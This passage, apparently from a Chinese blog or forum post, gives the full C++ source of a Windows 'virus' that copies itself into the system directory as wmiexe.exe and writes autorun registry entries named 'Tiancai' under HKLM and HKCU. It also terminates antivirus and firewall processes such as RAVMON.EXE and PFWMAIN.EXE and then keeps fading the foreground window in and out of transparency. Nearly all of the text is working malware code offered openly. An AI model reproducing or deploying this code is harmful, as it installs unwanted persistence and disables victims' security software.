HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun启动相,实现开机自运行。病毒表现为是使用SetLayeredWindowAttributes函数,使当前窗口变为透明。
程序运行先关闭防火墙,写入注册表,再用LoadLibrary和GetProcAddress确定SetLayeredWindowAttributes函数位置,再用GetForegroundWindow得到当前窗口句柄,使其透明。
透明.cpp程序如下
#include "stdafx.h"
#include <winuser.h>
#include <windows.h>
#include <shellapi.h>
#include <tlhelp32.h>
#pragma comment(lib, "User32.lib")
unsigned char level;
char buffer[255];
char syspath[100];
char exefile[100];
int err;
HKEY regkey;
HANDLE hMutex;
typedef DWORD (WINAPI *PFUNC)(HWND,DWORD,BYTE,DWORD);
bool instr(char* a,char* b)
{
if (strlen(a)<strlen(b)){return false;}
unsigned int i,j;
bool r=false;
for (i=0;i<strlen(a)-strlen(b)+1;i++)
{
if ((a[i]==b[0])||(a[i]==b[0]+32)||(a[i]==b[0]-32))
{
r=true;
for (j=i;j-i<strlen(b);j++)
{
if ((a[j]!=b[j-i])&&(a[j]!=b[j-i]+32)&&(a[j]!=b[j-i]-32)){r=false;break;}
}
}
}
return r;
}
void KillProc(bool opt)
{
HANDLE handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32* info=new PROCESSENTRY32;
info->dwSize=sizeof(PROCESSENTRY32);
if(Process32First(handle,info))
{
if(GetLastError()!=ERROR_NO_MORE_FILES )
{
if (opt)
{
if (instr(info->szExeFile,"wmiexe.exe"))
{
HANDLE h=OpenProcess(0,false,info->th32ProcessID);
TerminateProcess(h,0);
}
}
else
{
if (instr(info->szExeFile,"PFWMAIN.EXE")||
instr(info->szExeFile,"RAVMON.EXE")||
instr(info->szExeFile,"RAVTIMER.EXE")||
instr(info->szExeFile,"RAVSERVICE.EXE")||
instr(info->szExeFile,"CCENTER.EXE"))
{
HANDLE h=OpenProcess(0,false,info->th32ProcessID);
TerminateProcess(h,0);
}
}
while(Process32Next(handle,info)!=FALSE)
{
if (opt)
{
if (instr(info->szExeFile,"wmiexe.exe"))
{
HANDLE h=OpenProcess(0,false,info->th32ProcessID);
TerminateProcess(h,0);
}
}
else
{
if (instr(info->szExeFile,"PFWMAIN.EXE")||
instr(info->szExeFile,"RAVMON.EXE")||
instr(info->szExeFile,"RAVTIMER.EXE")||
instr(info->szExeFile,"RAVSERVICE.EXE")||
instr(info->szExeFile,"CCENTER.EXE"))
{
HANDLE h=OpenProcess(0,false,info->th32ProcessID);
TerminateProcess(h,0);
}
}
}
}
}
CloseHandle(handle);
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
level=255;
int d_level=5;
HWND hwnd;
long win_long;
strset(syspath,0);
strset(exefile,0);
HMODULE module = GetModuleHandle(0);
GetModuleFileName(module, exefile, sizeof (exefile));
GetSystemDirectory(syspath,100);
if (!instr(exefile,syspath))
{
strcat(syspath,"\wmiexe.exe");
while (CopyFile(exefile,syspath,false)==0)
{
err=GetLastError();
if (err==32){KillProc(true);}
Sleep(10);
}
ShellExecute(NULL,"OPEN",syspath,NULL,NULL,1);
Sleep(10);
ExitProcess(0);
}
else
{
hMutex = CreateMutex (NULL, TRUE, " ");
if (GetLastError () == ERROR_ALREADY_EXISTS){::ExitProcess(0);}
err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",®key);
err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));
err=RegCloseKey(regkey);
err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",®key);
err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));
err=RegCloseKey(regkey);
err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",®key);
err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));
err=RegCloseKey(regkey);
err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",®key);
err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));
err=RegCloseKey(regkey);
}
HMODULE m_hDLLUser32=LoadLibrary( "user32" );
PFUNC SetLayeredWindowAttributes =(PFUNC)::GetProcAddress( m_hDLLUser32, "SetLayeredWindowAttributes" );
start:
//hwnd=FindWindow("Shell_TrayWnd",NULL);
hwnd=GetForegroundWindow();
if ((hwnd!=0)&&
(hwnd!=GetDesktopWindow())&&
(hwnd!=FindWindow("Shell_TrayWnd",NULL))&&
(hwnd!=FindWindow("Progman",NULL)))
{
win_long=GetWindowLong(hwnd,GWL_EXSTYLE);
SetWindowLong(hwnd,GWL_EXSTYLE,win_long|0x80000);
SetLayeredWindowAttributes(hwnd, NULL, level, 2);
}
Sleep(1);
if (level>=254){d_level*=(-1);Sleep(1000);}
if (level<=50){d_level*=(-1);}
level+=d_level;
goto start;
return 0;
}